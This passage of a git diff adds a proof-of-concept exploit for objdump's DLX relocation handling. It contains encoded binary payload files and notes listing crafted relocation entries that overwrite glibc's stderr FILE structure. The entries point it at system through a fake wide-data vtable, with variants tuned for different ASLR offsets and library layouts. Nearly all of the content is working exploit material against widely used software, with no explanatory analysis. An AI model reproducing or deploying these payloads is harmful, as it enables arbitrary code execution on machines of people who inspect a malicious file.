sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..1b682a906e8579deaa1680782783307efb821573 GIT binary patch literal 1280 zcmd5*T}vB56g`{W7-OqOqqfn44+<6nv9nQ=5~ZbLEwo^v4~6<5hQ<%DMw|$Wf`7q3 z;gj?~^s((P2(jV?_OIe3vpPV&Y33!``WL~ z_}{0@2T-1vpvH`_Tl_E(f!N0&m zqCE!m3O)h)L)3rffMM!R4H%*B%ma@^e*-*D z1+6QD9UKjjNB$$YS>ku$N&Kg1x8Qjm(HRW5!#v3|Xit7k)O!qnui@vtag*@p4gZMY zFBo<9tKMlMT4S4(W2;4G%30iZHhjZ zK3Ddk&!x}h`zy5?hb@#oH|htQYumdUO_cT FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..8f5ab73c550552a01b1a4903ce864a89a5e4d211 GIT binary patch literal 1280 zcmd5*%Ss$U6g@rNI*yO1Gtu}6xQL)2jHw=U+^bf ziT{vg%ohl{75oDQh4$Qj*;5P2G8d}OJ@=luRek5yueopYR?0$b*7^ngM8JOVb3^{# zk2Gpy?SJK1w}74D)$af&<9XL5poTm(0n`dk0%?htfjaVrM<65k1k?*Ya|ylxjYPW} zXcGJke30Lr1I;%1DbOPEGoV%CH$Yb6w?Izfcfd!+|F!^aj5`xRJLAqI@JZr}Ku0QQ zU1!+At`K?TJH}#(|Ai;QLuW=kopKE5)A`Wv3?e+BZDfExe+ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.notes new file mode 100644 index 0000000..3d99c7f --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x06 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..7c5ed7091b8c1afe535eb3d5e2fff048344eaee5 GIT binary patch literal 1280 zcmd5*%Ss$U6g@rNI*yO1Gtu}6xQL)2jHw=U+^bf ziT{vg%ohl{7XLs&p*^=>_S8bM%!R6R&%I}ERo}VwYwp{;m9h|pQb zBaPZv`(HWMEnsJO^*g}Hc;0mhs3A{H0JVaXKw9EuppLxZ5y%KW0ri5Hzuyf>Z``kbL}H}suG zp8cvizsJabG4g%oLAh>x{{cfkXy^;2+56=8jT(CPyXySuWxsq}f7Z}182Tl0>1))_ zW%^SLodAJzktk`tmvJ~ z%a@soEb`L~BiB&o)^W*P2oKF-E$cT)4Hrk<*UM}U dgq$E|uW;M&-C&E(ElBb$ZeP-$dgH;}Ujg*rfE)k- literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.notes new file mode 100644 index 0000000..7850157 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x06 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..4c4baf7179fc6ad2ad3f015828f37e020eacbb59 GIT binary patch literal 1280 zcmd5*+e%wO6kR9h#27F2l4^}D^r3=+5IZN)L{t<+Ewo^v4~6zY6ypW7hD-_-h5mv+ z;gk3eeXRY0KzuFq4-^!RYoD7Z^HBQO4Kr)6y;t_k+1c}b<=v{4vJji~>70HdVE^%R zC4Zkl1|6~XzjCY=U}t&tYrx5R-qjJ1CQr=)9fI>fM&dP~lf3%|$O_&9U4nO9g7-iV z(S8o}3cdiI$nVa8KAZdm=$H5@Fd*?JFevdBkdyc|@Radi{lF08&KxkzxHAttllU88 zBo(wSA9ipwL>~DUW3j~l!jt$>lw0sTkLU~r+@YW388pW(6ZtMf-)rc3Z`>vHIYU2e z=<`ON{c1b^rICMS5E1DLqKExv5o83&bC|8+tsbFyBqsoc8*Y}R}b2_K0a)0ZlRzX^#J!mFTCTwfXtYz z=$*^Umzjzz@-qx1=dnW0HxgTv%Q3?F$5NR2Nt7jZ{5}&qxnwSchi0*s^@AkM#ZmY5 gGMkejCy3eaxqbHCV2jQzO7byoU(jE8 FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..5a4487645ca42b4c0a02c00574d47d3b8dc92022 GIT binary patch literal 1280 zcmd5*O)n%-6g|~dwDwIK--!sxNF;4uHG?1{1Pc-p3xdQD?ISTG@p=+MGV>E=&vsVg z2e7jA6C|uBc7A|GIk!H#%Zr7jo7_70oO|l!)vNn{Pt8qR2@8d=R{pV$3HGDk>-V2M zNTRgh{ZK_>1h7*;Via&vo_Dnlln6fqN(Ik>r0Cy)GV+QgASJjAlnbsh1=oN|qJ08X z37!Jg^4=ey#wNc9YDIql>O{W<>Zv;;K$^NU3N%o^=IMMA{S0Un{Tyf#eF$hy1V`5r z09r$A3-N8>VzK|i9q^;*wBUIj(Wwu(!#d8Bxa+=*^~()^mEo@?e~$UnhQHD9w;26) zqu*ilyNv$lr%o!x{r4LFKEt0qnD`&}4;p^{hgaYKZC*~Jxc;Q!pE3Ni-gtPEMv-C2oJ;JTGkCo36rDl??Gm> dH{=8fdx4KtzYHGHp0d&`>h=Zeu_6!l{sK7nd(r>^ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.notes new file mode 100644 index 0000000..e625fea --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..c3bd2df1c4c09739d4983471647c1456ff0066c2 GIT binary patch literal 1280 zcmd5*O-oxr6g@BRX^fxIRBKcaX`zA;J1?;+NvROjMGFzSsMJENm{y^!kcnVv!TtpI zy6vj?19a78e?p;dh3@9of7bX`Z;fBSoC9HMD!Ejq38?1 zXd<|}YycPwaXiG^fs4id3wOXn(P_c+JfbrcaEE!EC-L|3X{_FD`1=fhn*2KE&lvs@ z!=E+k6GnZ~s6R65Pp+n@wDvz^_-74&ey@BPKi|CJ=YMEB|BH&aTkDq%|El4CNiO#q z-DiclM8sbQw8_~=egt*>6k0*M(0S+r^c?gv=y~V`=tY*K%(|jM(V=Kj^eCDXU5YkE zpG%)B>(J-Y=kopK8nuH4a@)17{g2h%FCX@htJglYasBmk=UcU5H6j7d}5bsC!HI5=vtd?QU{>KuB1mBB4WF7yWiCrAh7sA7^xR&*sq=SR4 i?(ac*b0*{j344vxhMxvgw5PljTe|&=`STVJ_I?9@&3w@S literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.notes new file mode 100644 index 0000000..db97a8a --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..d255eda80ebcaa47c8b95eb314b5da20d1a0aa2f GIT binary patch literal 1280 zcmd5*O-oxr6g@BRX^fxIRBKcaX`zA;J1?;+NvROjMGFzSsMJENm{y^!kcnVv!TtpI zy6vj?19a78e?pAhD;q6pY2AW;IGl;@pQfezuvK&RjdkQ99r=pyfV1Ed7kfo{PK4#9Uo zFVX%6^a*|k`sKSHz<^Eu4@irC0St=%2Na91rn!;9{}=!X5BXbXxE{kLU~q++iN)N&J0$8mo63{yxK>CclpPGlqY} z@Mn$sgi)U~>W_^2ldCBzt^Lm!{#nDH-z#6n&o^)Q`5)TO|Dq!9*7{|`ziRkjlFPkD z_gP^s5%JdnZF2UJA3a|a8Tz~!Cc)x|5Zqx(Z3A1pIcLC`! z8PPkJmoGgPMU*Eg#QTwbjibmEt7Vw8|FOg&!S~`1S;xO;Vi$+>h43&eu4Vlu>EK|i i`+JbyoC!HW!d~OF;ithA?I|zCmTv!I{=CJ5z25+W7kttH literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.notes new file mode 100644 index 0000000..60bc8f9 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..5cea9885154c7f6912971e78c1ca9a357ed45c4b GIT binary patch literal 1280 zcmd5*%Ss$U6g@rN+A~I@&P0td5Q2h&Fj_sMPSB8mL>CDd$RgqhK5%@1nlLqjLBV`N z_Rcn|kPpz6OFuzKwt~BSKo*^I`!UlNS-A8<)w$=~(?wPFt&=zJ=B$*3Mp#SVnI{DM zCa4vIc?2$68{T`Bq^1Eo1EgjEC*%8PD?p3zQ=nC_4!EMP0%`IGAAyYEBG4vS<`7&4 z+KKiN&>?sXJe2Rg0-ZMbFQ7~G-$1wMmq3=fGY#aZJ2Su|>gT+j9??&MUeW77pXepv zaVosJ{t)ma!hs0?4_qwqU$_GvicSl@?-QMD$Q|ZM?&50bXQJL__&W@L7x~|WKWF%R z4S&B;e`?g98TCPv3oW?Lilyi_jC$lh9MpCFmC{Ntty;gQ7#xqUcdHDY_JG ziaw7%Pu8K&qtD~}%hxK0HRLxc>jzsaJNuiTkgryDZ*l!)ueP?1yslM4+>Wwnk9Ps- zF&XhYmzOU+6-S)A6q5bOzQ(uMl&IyHv;Xm$LxS%m7_v@q&%`u`^o8&!EUsl;khE~H j)q_1qZ;nQsAYs4fR1VT`iuY8IVpF$&Fn`(P;okoNf*E|$ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.notes new file mode 100644 index 0000000..51c11b5 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..79841f5254e06ac6ccb17b71a461a7cd0c1dff2a GIT binary patch literal 1280 zcmd5*O-mb56g`ufn8a$eMs3pyEm%+p#J)-VC@M;e?V>^i7fKcUz*q&VkQYHw(4XL5 zx2{TmK)dR)KS5~M;RE;bMKkUoj3QL%*?*CQWj#fK3+0TB!g0v(DOeueg9O|Zy)!6Yv|t_`VZuC zuF-i`8H+`HKA3juJobKrOxI3D>Z5d4U{%&>-(Qpws$x8P^#B}CBRNz=LN i{tU94#gG%k>^VM`{4jV#GnJ)yo43C(p1kG3?Ee6;oP5y$ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.notes new file mode 100644 index 0000000..8ba2cee --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 